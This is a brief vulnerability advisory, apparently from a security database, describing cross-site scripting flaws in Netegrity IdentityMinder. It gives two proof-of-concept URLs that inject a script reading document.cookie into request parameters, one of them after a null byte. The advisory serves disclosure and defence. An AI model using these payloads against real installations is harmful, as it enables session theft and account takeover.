Netegrity IdentityMinder Multiple Cross-Site Scripting Vulnerabilities

Netegrity IdentityMinder Multiple Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

http://www.example.com/idm/siteName/ims_mainconsole_principalpopuphandler.do?searchAttrs0=%25GROUP_NAME%25&searchOperators0=EQUALS&searchFilter0=&searchOrgDN=specifiedDNValue&incChildrenOrgFlag=NO&resultsPerPage=10&oid=&imsui_taskstate=RESOLVE_SCOPE&imsui_tpnametosearch=group&numOfExpressions=1%00<script>alert(document.cookie)</script>

http://PUT_ADDRESS_HERE:7001/idmmanage/mobjattr.do?diroid=OID&attrname=Group%20Members&mobjtype=2<script>alert(document.cookie)</script>